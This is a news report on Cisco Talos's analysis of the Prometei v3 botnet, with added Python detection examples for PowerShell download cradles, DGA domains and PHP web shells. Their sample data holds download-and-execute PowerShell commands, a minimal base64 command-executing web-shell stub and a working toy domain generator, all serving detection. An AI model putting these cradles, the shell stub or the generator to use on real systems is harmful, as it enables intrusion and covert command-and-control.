New Version of Prometei Botnet Infects Over 10,000 Systems Worldwide

March 10, 2023 | Ravie Lakshmanan | Endpoint Security / Hacking

Prometei botnet

An updated version of the botnet malware known as Prometei has infected more than 10,000 systems worldwide since November 2022.

Infections are geographically indiscriminate and opportunistic, with the largest numbers of victims reported in Brazil, Indonesia, and Turkey.

First observed in 2016, Prometei is a modular botnet with a large repertoire of components and several propagation methods, including one that exploits the ProxyLogon flaw in Microsoft Exchange Server.

Also notable is that the malware avoids infecting systems in Russia, which suggests the operators behind the campaign are likely based there.

The cross-platform botnet is financially motivated: it primarily uses its pool of infected hosts to mine cryptocurrency and harvest credentials.

In a report shared with The Hacker News, Cisco Talos said the latest variant of Prometei (referred to as v3) improves on existing functionality to frustrate forensic analysis and burrow deeper into victim machines.


The attack sequence proceeds as follows. Once a foothold is obtained, a PowerShell command downloads the botnet payload from a remote server. Prometei's main module then retrieves the actual cryptocurrency mining payload and the other auxiliary components onto the system.

Some of these auxiliary modules act as spreaders, designed to propagate the malware over Remote Desktop Protocol (RDP), Secure Shell (SSH), and Server Message Block (SMB).
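The PowerShell download-and-execute stage described above is what an endpoint detection would key on. The following is an added example written for this page, not Talos's detection logic and not Prometei code: it scans process-creation events for a PowerShell process that fetches content from a remote host, decoding any -EncodedCommand argument first so that the encoded form is not a blind spot. The events, paths and IP addresses are constructed (documentation ranges), and the indicator lists are my own assumptions about what a cradle tends to contain.

```python
import base64
import re

# Substrings that indicate a remote fetch, in-memory execution, or suppression
# of the interactive window. Matching is done on the lower-cased command line
# plus the decoded -EncodedCommand payload.
DOWNLOAD_INDICATORS = ["downloadstring", "downloadfile", "downloaddata",
                       "net.webclient", "invoke-webrequest", "invoke-restmethod",
                       "start-bitstransfer"]
EXEC_INDICATORS = ["invoke-expression", "iex ", "iex(", "start-process"]
EVASION_FLAGS = ["-nop", "-noprofile", "-w hidden", "-windowstyle hidden",
                 "-noni", "-noninteractive", "-exec bypass", "-executionpolicy bypass"]

# -EncodedCommand (and its short forms) takes base64 of a UTF-16LE string.
ENC_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return a finding for a PowerShell process that fetches remote content, else None."""
    image = event.get("Image", "").lower()
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return None
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    text = (cmdline + " " + (decoded or "")).lower()
    downloads = [i for i in DOWNLOAD_INDICATORS if i in text]
    if not downloads:
        return None
    return {
        "parent": event.get("ParentImage", ""),
        "command": cmdline,
        "decoded": decoded,
        "download": downloads,
        "exec": [i for i in EXEC_INDICATORS if i in text],
        "evasion": [f for f in EVASION_FLAGS if f in text],
    }


def scan(events):
    """Run analyze_event over a list of events and keep only the findings."""
    return [f for f in map(analyze_event, events) if f]


# Constructed sample events in a Sysmon Event ID 1 style; not real telemetry.
# The fourth event carries its cradle as an -EncodedCommand built right here.
_PLAIN = "(New-Object Net.WebClient).DownloadFile('http://203.0.113.5/p.exe','C:\\ProgramData\\p.exe')"
_ENCODED = base64.b64encode(_PLAIN.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.7/x.ps1')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command \"Get-Process | Sort-Object CPU\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Enc " + _ENCODED},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding["download"], finding["evasion"], finding["decoded"] or finding["command"])
```

The benign Get-Process invocation is deliberately left unflagged: the rule fires on a remote fetch, and the evasion flags and parent process are carried along as context for triage rather than used as the trigger.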


Prometei v3 is also notable for using a domain generation algorithm (DGA) to build out its command-and-control (C2) infrastructure. It additionally incorporates a self-updating mechanism and an expanded set of commands to harvest sensitive data and take control of hosts.
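To make the DGA point concrete, here is an added example (mine, not Talos's analysis and not Prometei's actual algorithm): a stand-in date-seeded generator of the kind a bot would iterate through until one name resolves, paired with the two defender-side checks that follow from it. If the algorithm and seed are known, that day's names can be precomputed and matched exactly; if not, crude lexical signals on the registrable label still separate generated names from ordinary ones. The seed, day key and DNS query names are all constructed.

```python
import hashlib
import math
from collections import Counter

VOWELS = set("aeiou")


def toy_dga(seed, day, count=5, tld="com", length=14):
    """Illustrative DGA: deterministic candidate C2 names for one day.

    Bot and operator share `seed`; the operator registers one of today's
    names and the bot queries the list in order until something resolves.
    """
    names = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}:{day}:{i}".encode()).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:length])
        names.append(f"{label}.{tld}")
    return names


def shannon_entropy(s):
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def longest_consonant_run(label):
    run = best = 0
    for ch in label:
        run = run + 1 if ch.isalpha() and ch not in VOWELS else 0
        best = max(best, run)
    return best


def dga_signals(fqdn):
    """Count crude generated-name signals on the registrable label (0 to 3)."""
    parts = fqdn.lower().rstrip(".").split(".")
    label = parts[-2] if len(parts) >= 2 else parts[0]
    if len(label) < 10:
        return 0
    vowel_ratio = sum(ch in VOWELS for ch in label) / len(label)
    return sum([
        shannon_entropy(label) >= 3.0,
        vowel_ratio <= 0.3,
        longest_consonant_run(label) >= 4,
    ])


def flag_queries(queries, known=frozenset(), min_score=2):
    """Return (name, reason) for queries on a precomputed DGA list or that look generated."""
    hits = []
    for q in queries:
        name = q.lower().rstrip(".")
        if name in known:
            hits.append((name, "known-dga"))
        elif dga_signals(name) >= min_score:
            hits.append((name, "heuristic"))
    return hits


# Constructed inputs: a hypothetical shared seed and day key, and a handful of
# observed DNS query names (documentation domains plus two generated-looking ones).
SEED, DAY = "demo-seed", "2023-03-10"
TODAY = frozenset(toy_dga(SEED, DAY))

OBSERVED_QUERIES = [
    "www.example.com",
    "cdn.example.org",
    "intranet.example-corp.com",
    "tvkqaexrmzhdpjw.net",
    toy_dga(SEED, DAY)[2],
]

if __name__ == "__main__":
    for name, reason in flag_queries(OBSERVED_QUERIES, known=TODAY):
        print(reason, name)
```

The exact-match path is the one that matters operationally: once an algorithm is reverse engineered, the day's names can be sinkholed or blocked ahead of time, whereas the lexical heuristics are only a triage aid and will miss DGAs built from dictionary words.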

Last but not least, the malware deploys an Apache web server bundled with a PHP-based web shell that can execute Base64-encoded commands and accept file uploads.
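A web shell with exactly those two capabilities leaves a recognisable static footprint in the PHP source: decoding of Base64 input, a command-execution call, and an upload handler, all driven by request parameters. The following is an added hunting example written for this page, not Prometei's web shell and not a Talos signature; it scores PHP files on how many of those capabilities they combine. The file paths and contents are constructed, and the third file is a minimal stand-in built to exhibit the described behaviour.

```python
import re

# One regex per capability; a file is scored on how many capabilities it combines,
# which separates a shell from a legitimate form handler that touches only one.
INDICATORS = {
    "decode": re.compile(r"base64_decode\s*\(", re.I),
    "exec":   re.compile(r"\b(?:eval|system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I),
    "upload": re.compile(r"move_uploaded_file\s*\(|\$_FILES\b", re.I),
    "input":  re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\b"),
}


def score_file(source):
    """Return the set of capability names present in one PHP source."""
    return {name for name, rx in INDICATORS.items() if rx.search(source)}


def hunt(files, min_hits=3):
    """files: {path: source}. Return {path: hits} for files combining >= min_hits capabilities."""
    scored = ((path, score_file(src)) for path, src in files.items())
    return {path: hits for path, hits in scored if len(hits) >= min_hits}


def executes_decoded_input(source):
    """True when a file both decodes Base64 and hands data to an execution call."""
    return {"decode", "exec"} <= score_file(source)


# Constructed webroot contents: a static page, a contact form that reads POST
# input legitimately, and a minimal shell-like file matching the description.
SAMPLE_FILES = {
    "/var/www/html/index.php": "<?php echo 'hello'; ?>",
    "/var/www/html/contact.php":
        "<?php $name = $_POST['name']; mail('ops@example.com', 'contact', $name); ?>",
    "/var/www/html/uploads/x.php":
        "<?php if (isset($_POST['c'])) { echo shell_exec(base64_decode($_POST['c'])); }"
        " if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); } ?>",
}

if __name__ == "__main__":
    for path, hits in hunt(SAMPLE_FILES).items():
        print(path, sorted(hits))
```

On a real host the same scoring would be run over the webroot on disk, and a match is worth correlating with file creation time and with the Apache process tree, since here the web server itself is dropped by the malware rather than being a pre-existing service.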

“This recent addition of new features [indicates] Prometei operators are continually updating the botnet and adding functionality,” said Talos researchers Andrew Windsor and Vanja Svajcer.
